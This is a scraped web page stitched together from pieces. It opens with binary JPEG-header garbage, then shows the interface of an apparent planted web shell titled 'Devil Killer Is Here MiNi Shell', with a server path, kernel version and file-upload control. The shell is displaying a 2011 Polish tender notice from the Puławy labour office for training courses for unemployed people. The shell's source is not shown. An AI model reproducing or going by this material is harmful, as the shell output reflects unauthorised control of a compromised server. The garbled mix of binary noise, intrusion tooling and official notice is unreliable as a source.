JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110526/148823-N-2011.html

<p class="kh_header"><b>Puławy: Realizacja usług szkoleniowych dla osób bezrobotnych  zarejestrowanych w Powiatowym Urzędzie Pracy w Puławach.</b><br>
<b>Numer ogłoszenia: 148823 - 2011; data zamieszczenia: 26.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Puławach , ul. Lubelska 2G, 24-100 Puławy, woj. lubelskie, tel. 0-81 8864096, faks 0-81 8864096.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.pulawy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja usług szkoleniowych dla osób bezrobotnych  zarejestrowanych w Powiatowym Urzędzie Pracy w Puławach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeprowadzenie szkoleń grupowych dla osób bezrobotnych zarejestrowanych w PUP
	w Puławach. 
           Zamówienie podzielono na 3 części:

	CZĘŚĆ I: KIEROWCA WÓZKA JEZDNIOWEGO Z NAPĘDEM SILNIKOWYM - dwie grupy
			      po 12 osób każda,


	CZĘŚĆ II:  KELNER - BARMAN - BARISTA - 10 osób,


	CZĘŚĆ III: OBSŁUGA KASY FISKALNEJ, TERMINALA KART PŁATNICZYCH I MINIMUM 		                  SANITARNE  - 15 osób..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 08.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że:

posiadają aktualny na dzień upływu terminu składania ofert wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej (zgodnie z ustawą o promocji zatrudnienia i instytucjach rynku pracy z dnia 20 kwietnia 2004r (Dz.U. z 2008r. Nr.69, poz. 415 z późn. zm.) oraz Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004 r. w sprawie rejestru instytucji szkoleniowych (Dz. U. Nr 236 poz 2365 z późn. zm.), - DOTYCZY WSZYSTKICH CZĘŚCI ZAMÓWIENIA.

Weryfikacja tego warunku następuje na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu - zgodnie z załączonym wzorem nr 1 do SIWZ. 

Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły: spełnia/nie spełnia, na podstawie analizy złożonych oświadczeń załączonych przez Wykonawcę do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że:

	wykonali należycie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli	okres 	prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 usługi szkoleniowe	w zakresie:

	dla CZĘŚCI I: KIEROWCA WÓZKA JEZDNIOWEGO,

	dla CZĘŚCI II: KELNER - BARMAN LUB KELNER - BARISTA LUB BARMAN - BARISTA,

	dla CZĘŚCI III:OBSŁUGA KASY FISKALNEJ,

	w wyniku, których zostało przeszkolonych co najmniej 20 osób.
	
	Do wykazu Wykonawca musi załączyć dokument potwierdzający należytą realizację usług - 	DOTYCZY WSZYSTKICH CZĘŚCI ZAMÓWIENIA.

	Weryfikacja tego warunku następuje na podstawie wykazu wykonanych usług - zgodnie	z załączonym wzorem nr 4 do SIWZ - wraz z załączonym dokumentem potwierdzającym, że	usługi te zostały wykonane należycie.	

	Wykonawca może wyszczególnić maksymalnie 7 należycie wykonanych usług.	W przypadku 	wyszczególnienia w wykazie większej liczby szkoleń Zamawiający uwzględni jedynie 
	7 pierwszych wyszczególnionych w wykazie.


	Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły:	spełnia/nie spełnia, na podstawie analizy złożonych dokumentów i oświadczeń załączonych	przez 	Wykonawcę do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że:


	do potrzeb przedmiotowego szkolenia będą dysponowali odpowiednimi warunkami lokalowymi 
	i wyposażeniem dydaktycznym, tj.:

	dla CZĘŚCI I -  KIEROWCA WÓZKA JEZDNIOWEGO Z NAPĘDEM SILNIKOWYM


	A)     DO CZĘŚCI TEORETYCZNEJ SZKOLENIA:

Pomieszczeniem wykładowym, dostosowanym do potrzeb szkolenia uwzględniającym bezpieczne i higieniczne warunki pracy i nauki, dostosowanym do liczby uczestników oraz potrzeb szkolenia, wyposażonym w co najmniej:
stoliki w ilości dostosowanej do ilości osób uczestniczących w szkoleniu;
12 miejsc siedzących;
tablicę lub flipchart;
pomoce dydaktyczne (np. plansze,  przezrocza, filmy, literaturę techniczną);
zapleczem sanitarnym (toalety, umywalki).

	B)     DO CZĘŚCI PRAKTYCZNEJ SZKOLENIA:

Placem manewrowym uwzględniającym bezpieczne i higieniczne warunki pracy
i nauki, na którym osoby bezrobotne będą mogły samodzielnie, pod nadzorem osoby prowadzącej zajęcia, wykonywać prace określone programem szkolenia;   
co najmniej dwoma rodzajami wózków, w tym jezdniowy wózek podnośnikowy;
zapleczem sanitarnym (toalety, umywalki).
	
	Weryfikacja tego warunku następuje na podstawie wykazu narzędzi, wyposażenia zakładu	i urządzeń 	technicznych dostępnych wykonawcy usług w celu realizacji zamówienia - zgodnie z załączonym 	wzorem nr 5 do SIWZ - wraz z informacją o podstawie dysponowania tymi zasobami. 

	Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły:	spełnia/nie spełnia, na podstawie analizy złożonych dokumentów i oświadczeń załączonych	przez 	Wykonawcę do oferty.

	dla CZĘŚCI II -  KELNER - BARMAN - BARISTA


	A)     DO CZĘŚCI TEORETYCZNEJ SZKOLENIA:

Pomieszczeniem wykładowym, dostosowanym do potrzeb szkolenia uwzględniającym bezpieczne i higieniczne warunki pracy i nauki, dostosowanym do liczby uczestników oraz potrzeb szkolenia, wyposażonym w co najmniej:
stoliki w ilości dostosowanej do ilości osób uczestniczących w szkoleniu;
10 miejsc siedzących;
tablicę lub flipchart;
5 kas fiskalnych, co najmniej trzech różnych typów, spełniających warunki techniczne określone w rozporządzeniu Ministra Finansów z dnia 28.11.2008r. w sprawie kryteriów i warunków technicznych, którym muszą odpowiadać kasy rejestrujące oraz warunków ich stosowania (DZ. U. nr 212 poz.1338).	
zapleczem sanitarnym (toalety, umywalki).

	B)     DO CZĘŚCI PRAKTYCZNEJ SZKOLENIA:

Pomieszczeniem dostosowanym do realizacji zajęć w zakresie części praktycznej szkolenia, uwzględniającym bezpieczne i higieniczne warunki pracy i nauki, dostosowanym do liczby uczestników oraz potrzeb szkolenia, wyposażonym w niezbędne urządzenia, akcesoria i przybory tj. minimum:    
naczynia kuchenne (talerze, sztućce, szklanki, filiżanki, kieliszki różnego rodzaju itp).;
minimum dwa ekspresy do kawy różnego typu, w tym co najmniej jeden ciśnieniowy; 
akcesoria do parzenia różnego rodzaju kaw (np. miarki do kawy, tamper, spieniacze do mleka, dzbanki);
tace kelnerskie - 10 sztuk;
shaker - 2 sztuki;
zapaski kelnerskie - 10 sztuk.

Urządzenia, akcesoria i przybory muszą być zabezpieczone w ilości umożliwiającej samodzielne wykonywanie prac określonych programem szkolenia każdemu uczestnikowi kursu.
zapleczem sanitarnym (toalety, umywalki).


	Weryfikacja tego warunku następuje na podstawie wykazu narzędzi, wyposażenia zakładu	i urządzeń 	technicznych dostępnych wykonawcy usług w celu realizacji zamówienia - zgodnie z załączonym 	wzorem nr 5 do SIWZ - wraz z informacją o podstawie dysponowania tymi zasobami. 

	Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły:	spełnia/nie spełnia, na podstawie analizy złożonych dokumentów i oświadczeń załączonych	przez 	Wykonawcę do oferty.



	dla CZĘŚCI III - OBSŁUGA KASY FISKALNEJ, TERMINALA KART PŁATNICZYCH I 				  MINIMUM SANITARNE

A) DO CZĘŚCI TEORETYCZNEJ SZKOLENIA:

Pomieszczeniem wykładowym, dostosowanym do potrzeb szkolenia uwzględniającym bezpieczne i higieniczne warunki pracy i nauki, dostosowanym do liczby uczestników
oraz potrzeb szkolenia, wyposażonym w co najmniej:
stoliki w ilości dostosowanej do ilości osób uczestniczących w szkoleniu:
15 miejsc siedzących,
tablicę lub flipchart,
zapleczem sanitarnym (toalety, umywalki).	

	B) DO CZĘŚCI PRAKTYCZNEJ SZKOLENIA:
Pomieszczeniem dostosowanym do potrzeb szkolenia w zakresie części praktycznej uwzględniającym bezpieczne i higieniczne warunki pracy i nauki, dostosowanym do liczby uczestników oraz potrzeb szkolenia, wyposażonym w niezbędne urządzenia, akcesoria
i przybory tj. minimum:
8 kas fiskalnych, co najmniej 3 różnych typów, spełniających warunki techniczne określone w rozporządzeniu Ministra Finansów z dnia 28.11.2008 r. w sprawie kryteriów i warunków technicznych, którym muszą odpowiadać kasy rejestrujące oraz warunków ich zastosowania (Dz. U. Nr 212, poz. 1338),
5 terminali kart płatniczych,
zapleczem sanitarnym (toalety, umywalki).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że do potrzeb	przedmiotowego szkolenia będą dysponowali: 
		
	dla CZĘŚCI I - KIEROWCA WÓZKA JEZDNIOWEGO Z NAPĘDEM SILNIKOWYM

	 co najmniej dwoma osobami zdolnymi do wykonania	zamówienia, tj. posiadającymi:
WYKSZTAŁCENIE: Min. średnie
DOŚWIADCZENIE ZAWODOWE: udokumentowane doświadczenie potwierdzające przeprowadzenie, co najmniej trzech szkoleń lub innych form kształcenia z zakresu KIEROWCA WÓZKA JEZDNIOWEGO

	dla CZĘŚCI II - KELNER - BARMAN - BARISTA

	 co najmniej trzema osobami zdolnymi do wykonania	zamówienia, tj. posiadającymi:
WYKSZTAŁCENIE: Min. średnie
DOŚWIADCZENIE ZAWODOWE: 
- udokumentowane doświadczenie potwierdzające przeprowadzenie, co najmniej dwóch szkoleń lub innych form kształcenia z zakresu: 
KELNER - BARMAN - 2 osoby, oraz
- udokumentowane doświadczenie potwierdzające przeprowadzenie, co najmniej jednego szkolenia lub innych form kształcenia z zakresu:
BARISTA - 1 osoba

	dla CZĘŚCI III - OBSŁUGA KASY FISKALNEJ, TERMINALA KART PŁATNICZYCH I  MINIMUM SANITARNE

	 co najmniej dwoma osobami zdolnymi do wykonania	zamówienia, tj. posiadającymi:
WYKSZTAŁCENIE: Min. średnie
DOŚWIADCZENIE ZAWODOWE udokumentowane doświadczenie potwierdzające przeprowadzenie, co najmniej trzech szkoleń lub innych form kształcenia z zakresu OBSŁUGI KASY FISKALNEJ

	Weryfikacja tego warunku następuje na podstawie wykazu osób (nie więcej jednak niż pięciu)	które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich	doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu	wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami - 	zgodnie z załączonym wzorem nr 6 do SIWZ.

	Wykonawca może wyszczególnić maksymalnie 5 osób przewidzianych do realizacji przedmiotu 	zamówienia. W przypadku  wyszczególnienia w wykazie większej liczby sosób Zamawiający 	uwzględni jedynie 5 pierwszych wyszczególnionych w wykazie.

	Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły:	spełnia/nie spełnia, na podstawie analizy złożonych dokumentów i oświadczeń załączonych przez Wykonawcę do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - DOTYCZY	WSZYSTKICH CZĘŚCI ZAMÓWIENIA.
	
	Weryfikacja tego warunku następuje na podstawie złożonego oświadczenia o spełnianiu			warunków udziału w postępowaniu  - zgodnie z załączonym wzorem nr 1 do SIWZ. 	

	Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły:			spełnia/nie spełnia, na podstawie analizy złożonych dokumentów i oświadczeń załączonych		przez Wykonawcę do oferty.
	
	ORAZ WYKAŻĄ BRAK PODSTAW DO WYKLUCZENIA Z NINIEJSZEGO POSTĘPOWANIA 		O UDZIELENIE ZAMÓWIENIA NA PODSTAWIE ART. 24 UST. 1 USTAWY.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany Formularz ofertowy - zgodnie z załączonym wzorem nr 3 do SIWZ;

2.Pełnomocnictwo do podpisywania dokumentów oferty, o ile nie wynika ono z innych złożonych 	dokumentów;

3.Program szkolenia - zgodnie z załączonym wzorem nr 7 do SIWZ;

4.Preliminarz kursu zawierający wszystkie elementy składowe ceny wraz z podaniem ich	wartości - 	zgodnie z załączonym wzorem nr 8 do SIWZ;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie wykonawcy - 15</li>
<li>3 - Doświadczenie zawodowe osób, które będą realizować zamówienie - 20</li>
<li>4 - Posiadanie przez wykonawcę certyfikatu jakości usług - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zakres świadczenia wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem	zawartym w ofercie przetargowej.


2.Zamawiający przekazuje wzór umowy, określającej warunki wykonania zamówienia formie	załącznika nr 9 do SIWZ.

3.Zamawiający dopuszcza możliwość zmian postanowień umowy w stosunku do treści oferty na	podstawie, której dokonano wyboru wykonawcy wyłącznie w szczególnie uzasadnionych	przypadkach o obiektywnym charakterze, niezależnych od wykonawcy za zgodą obu stron	w formie pisemnego aneksu zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych z dnia 	29 stycznia 2004 roku - (Dz. U. z 2010 r. Nr 113, poz.759 z późn. zm.) i dotyczyć mogą: 

godzin realizacji zajęć;
miejsca prowadzenia szkolenia;
osób prowadzących szkolenie;
terminu przeprowadzenia egzaminu końcowego;
terminu rozpoczęcia i zakończenia szkolenia;
materiałów dydaktycznych przekazywanych nieodpłatnie uczestnikom szkolenia.
4.W przypadku wystąpienia okoliczności, o których mowa w pkt. 3 Wykonawca jest zobowiązany 	niezwłocznie zawiadomić Zamawiającego, złożyć pisemne wyjaśnienie	zaistniałych okoliczności, 	oraz przedstawić propozycję zmian, które muszą być korzystne 	dla Zamawiającego i nie mogą być 	mniej korzystne niż określone w ofercie na podstawie, której dokonano wyboru Wykonawcy. 	Zamawiający dokona oceny przesłanek do zmiany umowy podejmie decyzję o ich słuszności. Zmiany 	wprowadzone zostaną w formie pisemnego aneksu do umowy.

5.Zamawiający zapłaci za zrealizowaną w całości usługę szkoleniową przelewem na konto Wykonawcy 	podane na fakturze, w ciągu 30 dni od daty dostarczenia prawidłowo wystawionej faktury.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
